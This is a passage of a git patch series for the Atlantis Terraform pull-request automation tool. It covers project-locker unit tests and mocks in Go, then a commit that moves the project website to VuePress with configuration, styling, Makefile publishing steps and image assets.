Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_LockFailed(t *testing.T) { -// t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error") -// p, l, _, _ := setupPreExecuteTest(t) -// // The response has LockAcquired: false and the pull request is a number -// // different than the current pull. -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: false, -// CurrLock: models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}}, -// }, nil) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure) -//} -// -//func TestExecute_ConfigErr(t *testing.T) { -// t.Log("when there is an error loading config, we return it") -// p, l, _, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreInitErr(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PreInit: []string{"pre-init"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.9.0") -// When(tm.Version()).ThenReturn(tfVersion) -// When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_InitErr(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it") -// p, l, tm, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) -// tfVersion, _ := version.NewVersion("0.9.0") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreGetErr(t *testing.T) { -// t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PreGet: []string{"pre-get"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_GetErr(t *testing.T) { -// t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it") -// p, l, tm, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_PreCommandErr(t *testing.T) { -// t.Log("when we get an error running pre commands we return it") -// p, l, tm, r := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ -// LockAcquired: true, -// }, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ -// PrePlan: []string{"command"}, -// }, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) -// When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error()) -//} -// -//func TestExecute_SuccessTF9(t *testing.T) { -// t.Log("when the project is on tf >= 0.9 it should be successful") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PreInit: []string{"pre-init"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion) -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init") -//} -// -//func TestExecute_SuccessTF8(t *testing.T) { -// t.Log("when the project is on tf < 0.9 it should be successful") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PreGet: []string{"pre-get"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.8") -// When(tm.Version()).ThenReturn(tfVersion) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "") -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get") -//} -// -//func TestExecute_SuccessPrePlan(t *testing.T) { -// t.Log("when there are pre_plan commands they are run") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PrePlan: []string{"command"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// -// res := p.Execute(&ctx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan") -//} -// -//func TestExecute_SuccessPreApply(t *testing.T) { -// t.Log("when there are pre_apply commands they are run") -// p, l, tm, r := setupPreExecuteTest(t) -// lockResponse := locking.TryLockResponse{ -// LockAcquired: true, -// } -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ParserValidator.Exists("")).ThenReturn(true) -// config := events.ProjectConfig{ -// PreApply: []string{"command"}, -// } -// When(p.ParserValidator.Read("")).ThenReturn(config, nil) -// tfVersion, _ := version.NewVersion("0.9") -// When(tm.Version()).ThenReturn(tfVersion) -// -// cpCtx := deepcopy.Copy(ctx).(events.CommandContext) -// cpCtx.Command = &events.Command{ -// Name: events.Apply, -// } -// cpCtx.Log = logging.NewNoopLogger() -// -// res := p.Execute(&cpCtx, "", project) -// Equals(t, events.TryLockResponse{ -// ProjectConfig: config, -// TerraformVersion: tfVersion, -// LockResponse: lockResponse, -// }, res) -// r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply") -//} -// -//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) { -// RegisterMockTestingT(t) -// l := lmocks.NewMockLocker() -// cr := mocks.NewMockProjectConfigReader() -// tm := tmocks.NewMockClient() -// r := rmocks.NewMockRunner() -// return &events.DefaultProjectLocker{ -// Locker: l, -// ParserValidator: cr, -// Terraform: tm, -// Run: r, -// }, l, tm, r -//} + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/locking/mocks" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestDefaultProjectLocker_TryLockWhenLocked(t *testing.T) { + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: false, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: "", + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, &events.TryLockResponse{ + LockAcquired: false, + LockFailureReason: "This project is currently locked by #2. The locking plan must be applied or discarded before future plans can execute.", + }, res) +} + +func TestDefaultProjectLocker_TryLockWhenLockedSamePull(t *testing.T) { + RegisterMockTestingT(t) + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{Num: 2} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + lockKey := "key" + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: false, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: lockKey, + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, true, res.LockAcquired) + + // UnlockFn should work. + mockLocker.VerifyWasCalled(Never()).Unlock(lockKey) + err = res.UnlockFn() + Ok(t, err) + mockLocker.VerifyWasCalledOnce().Unlock(lockKey) +} + +func TestDefaultProjectLocker_TryLockUnlocked(t *testing.T) { + RegisterMockTestingT(t) + mockLocker := mocks.NewMockLocker() + locker := events.DefaultProjectLocker{ + Locker: mockLocker, + } + expProject := models.Project{} + expWorkspace := "default" + expPull := models.PullRequest{Num: 2} + expUser := models.User{} + + lockingPull := models.PullRequest{ + Num: 2, + } + lockKey := "key" + When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn( + locking.TryLockResponse{ + LockAcquired: true, + CurrLock: models.ProjectLock{ + Pull: lockingPull, + }, + LockKey: lockKey, + }, + nil, + ) + res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject) + Ok(t, err) + Equals(t, true, res.LockAcquired) + + // UnlockFn should work. + mockLocker.VerifyWasCalled(Never()).Unlock(lockKey) + err = res.UnlockFn() + Ok(t, err) + mockLocker.VerifyWasCalledOnce().Unlock(lockKey) +} diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go new file mode 100644 index 0000000000..6aba4616e6 --- /dev/null +++ b/server/events/yaml/mocks/matchers/valid_spec.go @@ -0,0 +1,20 @@ +package matchers + +import ( + "reflect" + + "github.com/petergtz/pegomock" + valid "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +func AnyValidSpec() valid.Spec { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Spec))(nil)).Elem())) + var nullValue valid.Spec + return nullValue +} + +func EqValidSpec(value valid.Spec) valid.Spec { + pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) + var nullValue valid.Spec + return nullValue +} diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go new file mode 100644 index 0000000000..f66c58778a --- /dev/null +++ b/server/events/yaml/mocks/mock_parser_validator.go @@ -0,0 +1,80 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events/yaml (interfaces: ParserValidator) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + valid "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type MockParserValidator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockParserValidator() *MockParserValidator { + return &MockParserValidator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { + params := []pegomock.Param{repoDir} + result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Spec)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 valid.Spec + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(valid.Spec) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockParserValidator) VerifyWasCalledOnce() *VerifierParserValidator { + return &VerifierParserValidator{mock, pegomock.Times(1), nil} +} + +func (mock *MockParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierParserValidator { + return &VerifierParserValidator{mock, invocationCountMatcher, nil} +} + +func (mock *MockParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierParserValidator { + return &VerifierParserValidator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierParserValidator struct { + mock *MockParserValidator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierParserValidator) ReadConfig(repoDir string) *ParserValidator_ReadConfig_OngoingVerification { + params := []pegomock.Param{repoDir} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ReadConfig", params) + return &ParserValidator_ReadConfig_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ParserValidator_ReadConfig_OngoingVerification struct { + mock *MockParserValidator + methodInvocations []pegomock.MethodInvocation +} + +func (c *ParserValidator_ReadConfig_OngoingVerification) GetCapturedArguments() string { + repoDir := c.GetAllCapturedArguments() + return repoDir[len(repoDir)-1] +} + +func (c *ParserValidator_ReadConfig_OngoingVerification) GetAllCapturedArguments() (_param0 []string) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]string, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(string) + } + } + return +} diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go index af17335c1b..a5b5c633eb 100644 --- a/server/events/yaml/raw/step.go +++ b/server/events/yaml/raw/step.go @@ -130,6 +130,8 @@ func (s Step) Validate() error { for k := range elem { keys = append(keys, k) } + // Sort so tests can be deterministic. + sort.Strings(keys) if len(keys) > 1 { return fmt.Errorf("step element can only contain a single key, found %d: %s", diff --git a/server/server.go b/server/server.go index d02c1c9221..45ad488912 100644 --- a/server/server.go +++ b/server/server.go @@ -232,10 +232,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{ - ParserValidator: &yaml.ParserValidator{}, - ProjectFinder: &events.DefaultProjectFinder{}, - VCSClient: vcsClient, - Workspace: workspace, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + AtlantisWorkspaceLocker: workspaceLocker, }, ProjectCommandRunner: &events.ProjectCommandRunner{ Locker: projectLocker, From dd12ce167ee98ef97154927008a3ec60e15a3293 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 22 Jun 2018 17:12:40 +0100 Subject: [PATCH 45/69] Create docs with VuePress --- .gitignore | 1 + Makefile | 6 +- package.json | 9 + runatlantis.io/.vuepress/components/Home.vue | 21 + runatlantis.io/.vuepress/config.js | 41 + runatlantis.io/.vuepress/override.styl | 40 + .../public/apple-touch-icon-114x114.png | Bin 0 -> 11680 bytes .../public/apple-touch-icon-120x120.png | Bin 0 -> 11094 bytes .../public/apple-touch-icon-144x144.png | Bin 0 -> 12662 bytes .../public/apple-touch-icon-152x152.png | Bin 0 -> 16807 bytes .../public/apple-touch-icon-57x57.png | Bin 0 -> 3622 bytes .../public/apple-touch-icon-60x60.png | Bin 0 -> 4016 bytes .../public/apple-touch-icon-72x72.png | Bin 0 -> 4854 bytes .../public/apple-touch-icon-76x76.png | Bin 0 -> 5739 bytes .../.vuepress/public/favicon-128.png | Bin 0 -> 6555 bytes .../.vuepress/public/favicon-16x16.png | Bin 0 -> 629 bytes .../.vuepress/public/favicon-196x196.png | Bin 0 -> 27206 bytes .../.vuepress/public/favicon-32x32.png | Bin 0 -> 1381 bytes .../.vuepress/public/favicon-96x96.png | Bin 0 -> 6105 bytes runatlantis.io/.vuepress/public/favicon.ico | Bin 0 -> 34494 bytes runatlantis.io/.vuepress/public/hero.png | Bin 0 -> 14750 bytes .../.vuepress/public/mstile-144x144.png | Bin 0 -> 12662 bytes .../.vuepress/public/mstile-150x150.png | Bin 0 -> 55616 bytes .../.vuepress/public/mstile-310x150.png | Bin 0 -> 112703 bytes .../.vuepress/public/mstile-310x310.png | Bin 0 -> 227955 bytes .../.vuepress/public/mstile-70x70.png | Bin 0 -> 6555 bytes runatlantis.io/README.md | 16 + runatlantis.io/docs/README.md | 405 ++ runatlantis.io/docs/deployment.md | 374 + runatlantis.io/docs/getting-started.md | 0 runatlantis.io/docs/images/atlantis-logo.png | Bin 0 -> 14750 bytes .../docs/images/atlantis-walkthrough-icon.png | Bin 0 -> 79344 bytes .../docs/images/pr-comment-apply.png | Bin 0 -> 19474 bytes .../docs/images/pr-comment-help.png | Bin 0 -> 19736 bytes .../docs/images/pr-comment-plan.png | Bin 0 -> 19305 bytes runatlantis.io/docs/images/status.png | Bin 0 -> 45991 bytes runatlantis.io/docs/pull-request-commands.md | 39 + yarn.lock | 6179 +++++++++++++++++ 38 files changed, 7128 insertions(+), 3 deletions(-) create mode 100644 package.json create mode 100644 runatlantis.io/.vuepress/components/Home.vue create mode 100644 runatlantis.io/.vuepress/config.js create mode 100644 runatlantis.io/.vuepress/override.styl create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png create mode 100644 runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png create mode 100644 runatlantis.io/.vuepress/public/favicon-128.png create mode 100644 runatlantis.io/.vuepress/public/favicon-16x16.png create mode 100644 runatlantis.io/.vuepress/public/favicon-196x196.png create mode 100644 runatlantis.io/.vuepress/public/favicon-32x32.png create mode 100644 runatlantis.io/.vuepress/public/favicon-96x96.png create mode 100644 runatlantis.io/.vuepress/public/favicon.ico create mode 100644 runatlantis.io/.vuepress/public/hero.png create mode 100644 runatlantis.io/.vuepress/public/mstile-144x144.png create mode 100644 runatlantis.io/.vuepress/public/mstile-150x150.png create mode 100644 runatlantis.io/.vuepress/public/mstile-310x150.png create mode 100644 runatlantis.io/.vuepress/public/mstile-310x310.png create mode 100644 runatlantis.io/.vuepress/public/mstile-70x70.png create mode 100644 runatlantis.io/README.md create mode 100644 runatlantis.io/docs/README.md create mode 100644 runatlantis.io/docs/deployment.md create mode 100644 runatlantis.io/docs/getting-started.md create mode 100644 runatlantis.io/docs/images/atlantis-logo.png create mode 100644 runatlantis.io/docs/images/atlantis-walkthrough-icon.png create mode 100644 runatlantis.io/docs/images/pr-comment-apply.png create mode 100644 runatlantis.io/docs/images/pr-comment-help.png create mode 100644 runatlantis.io/docs/images/pr-comment-plan.png create mode 100644 runatlantis.io/docs/images/status.png create mode 100644 runatlantis.io/docs/pull-request-commands.md create mode 100644 yarn.lock diff --git a/.gitignore b/.gitignore index 4da26ca0b0..b84b2a1911 100644 --- a/.gitignore +++ b/.gitignore @@ -8,3 +8,4 @@ website/src/public .DS_Store .cover .terraform/ +node_modules/ diff --git a/Makefile b/Makefile index c2510ac725..b2d0129be6 100644 --- a/Makefile +++ b/Makefile @@ -82,9 +82,9 @@ end-to-end-tests: ## Run e2e tests ./scripts/e2e.sh generate-website-html: ## Generate HTML for website - cd website/src && hugo -d ../html + yarn website:build upload-website-html: ## Upload generated website to s3 aws s3 rm s3://www.runatlantis.io/ --recursive - aws s3 sync website/html/ s3://www.runatlantis.io/ - rm -rf website/html/ + aws s3 sync runatlantis.io/.vuepress/dist/ s3://www.runatlantis.io/ + rm -rf runatlantis.io/.vuepress/dist diff --git a/package.json b/package.json new file mode 100644 index 0000000000..a74a965486 --- /dev/null +++ b/package.json @@ -0,0 +1,9 @@ +{ + "devDependencies": { + "vuepress": "^0.10.2" + }, + "scripts": { + "website:dev": "vuepress dev runatlantis.io", + "website:build": "vuepress build runatlantis.io" + } +} diff --git a/runatlantis.io/.vuepress/components/Home.vue b/runatlantis.io/.vuepress/components/Home.vue new file mode 100644 index 0000000000..d118f3a8c1 --- /dev/null +++ b/runatlantis.io/.vuepress/components/Home.vue @@ -0,0 +1,21 @@ + diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js new file mode 100644 index 0000000000..9e2f6a54ed --- /dev/null +++ b/runatlantis.io/.vuepress/config.js @@ -0,0 +1,41 @@ +module.exports = { + title: 'Atlantis', + description: 'Terraform Automation by Pull Request', + head: [ + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-32x32.png', sizes: '32x32' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-16x16.png', sizes: '16x16' }], + ['link', { rel: 'icon', type: 'image/png', href: 'favicon-128.png', sizes: '128x128' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '57x57', href: 'apple-touch-icon-57x57.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '114x114', href: 'apple-touch-icon-114x114.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '72x72', href: 'apple-touch-icon-72x72.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '144x144', href: 'apple-touch-icon-144x144.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '60x60', href: 'apple-touch-icon-60x60.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '120x120', href: 'apple-touch-icon-120x120.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '76x76', href: 'apple-touch-icon-76x76.png' }], + ['link', { rel: 'apple-touch-icon-precomposed', sizes: '152x152', href: 'apple-touch-icon-152x152.png' }], + ['meta', {name: 'msapplication-TileColor', content: '#FFFFFF' }], + ['meta', {name: 'msapplication-TileImage', content: 'mstile-144x144.png' }], + ['meta', {name: 'msapplication-square70x70logo', content: 'mstile-70x70.png' }], + ['meta', {name: 'msapplication-square150x150logo', content: 'mstile-150x150.png' }], + ['meta', {name: 'msapplication-wide310x150logo', content: 'mstile-310x150.png' }], + ['meta', {name: 'msapplication-square310x310logo', content: 'mstile-310x310.png' }], + ['link', { rel: 'stylesheet', sizes: '152x152', href: 'https://fonts.googleapis.com/css?family=Lato:400,900' }] + ], + themeConfig: { + nav: [ + {text: 'Home', link: '/'}, + {text: 'Docs', link: '/docs/'}, + {text: 'Blog', link: 'https://medium.com/runatlantis'} + ], + sidebar: [ + '/docs/', + '/docs/pull-request-commands', + '/docs/deployment', + ], + repo: 'runatlantis/atlantis', + docsDir: 'runatlantis.io', + editLinks: true, + } +} \ No newline at end of file diff --git a/runatlantis.io/.vuepress/override.styl b/runatlantis.io/.vuepress/override.styl new file mode 100644 index 0000000000..deb097c9dc --- /dev/null +++ b/runatlantis.io/.vuepress/override.styl @@ -0,0 +1,40 @@ +$accentColor = #0074db +$textColor = #2c3e50 +$borderColor = #eaecef +$codeBgColor = #282c34 + +.theme-container.home-custom { + .hero { + h1 { + font-size: 64px + font-family: Lato, sans-serif + font-weight: 900 + color: #222 + } + img { + height: 200px + } + } + p.description { + position: relative + } + p.description:before { + position: absolute; + content: ''; + width: 40px; + height: 3px; + top: -19px; + left: 50%; + margin-left: -20px; + background: #ff3366; + } + .feature { + h2 { + color: #222 + } + p { + color: #222 + } + } +} + diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png new file mode 100644 index 0000000000000000000000000000000000000000..e5d8f6877607a1f8b76375d04f96ff47b9ac6f12 GIT binary patch literal 11680 zcmV;REnm`!P)B;yzoU{tJ;z zKehcGn8^}FHVAqp%05M|Lf9$FPDD3>YyzfL855y}0?1J;{ZRIj&#VKJo6W>aR$HILR82d_L*tM7@T-c6X*_A0nvalM$*a;CJ&FFWv*69C}N~i3UFEiEh5K&&jX(T4({J0KMPZ{ zs`Rgdkq2gU3e~qD@?KSaNuC=kK9dZ}8a>C!FOS7@C73I<6GXTV^rOJ%_U}m+YLNJu zrT?dlJTRjhP;OPx_oD2G%d3Q~REG*Jx`Jw5v*sPuzis1;BC z=P8V;&`4k+%|R^=UN~ELfvE%h8Ond(zgK!c&5l-LWS#9a_fVEd`+Q(V_bS{j@RFQI zg@sX2F$)7hidDPXnP0_CElY|w1VOoMT)22#EdqUoCl`gYy>QvDMStQjvOPFxh5b}T zL~Nhp>5$Oo`tz^^?>^vN`}fGh6*P@$7t?)BHgXg&pJ8<>I4Cb{;qRk-7-71ktZXQz zA`FAKZWKTT1QJm;w_q~O;mi+Uwx>)tVPg|oiLkltPlmiNRpDe81{s{`!SXO9z-k>P zzeTt-TB*8a|D2$ItnkOzEQF&7;we~Ie*_lFUpQNj|JRbE#!73HffsZbJ3%5qWhC#2=U;RK*}I!PYfk zV=HgBeJrvIi=z+QQz9k(J}S0Q6H`#tZ;Hs<_V1B1QR%2P zyw#{1GfUK$cE7D4@G$Vk{d?pwuVgj5CzW+#-CL);N3JD5IFnrm zd`pylCb}ub;LKEZ|520+BDv!ug##oaq@r9lp5IGRSfq*k^n7#KDd|V5-;7g{$^~e(OL^yDEB*$}5#W4`)A52WIp} zRlO5oo2a1TugAQ5&*+7d*>h|VngSQuMM|CSip4q{%CpNbEH&3aQvCKJ1uL}(lvg@4 z>Y)@GK|65*C(VtC0=651ufO$_h`fIP9=Sgv?V8l=^J3(Ind~}LzM<$g=feB+GBZ6N zxN#ElaXGbD8Rlf!0V0X2Z|7oTdpuYgb&l-OK zj)}-GM>ccS>4F$}U`Dr~d`HoJ21uRqD>)5>ld-nlYLo9wd1k4?k1D09hH&MSvay*@ z@!1|6SuktOuvIgGsRlFzmWKJCzb7i{T$-YuGwDFr%pIM?~ZggMuoP zP^5JY_@yoRg1%Wm9Ax=2;k##Yrv9{(09Q`Iu8CZtrkikC)$*oDs_@WUet+$>v$<92 zxgLDwSvXm@@yKAo#(5oH*Ls|u&6>|NKT!pVO3`}WFTvxZnJtjx^pz>Mw#z7I^-W8jt; zsle~GY{cl28d-xbKu(?m-Evoy<>5&3oZ6#V+d zt0PVw5mj@<`k8XiS>fP0v-YCWqp=a00>{Y){D&*b;l0)Lz1s5nb~z)zelou=1?PS3 zQ2b+;J}&lnpQ^s%eS4F53#=riqqeL3`#-TvERc}GNiYc6C`?f$S7oasKwUkNT(ZYf z;Z<8~fgN1@)!#L7q$q0S&m9qY+5SE9 z03%Lm_;aJQEp=c<8=&989?yvMnAN4F&_-C-CSL~@bp)pq{V__Q*D~de-2256CO` 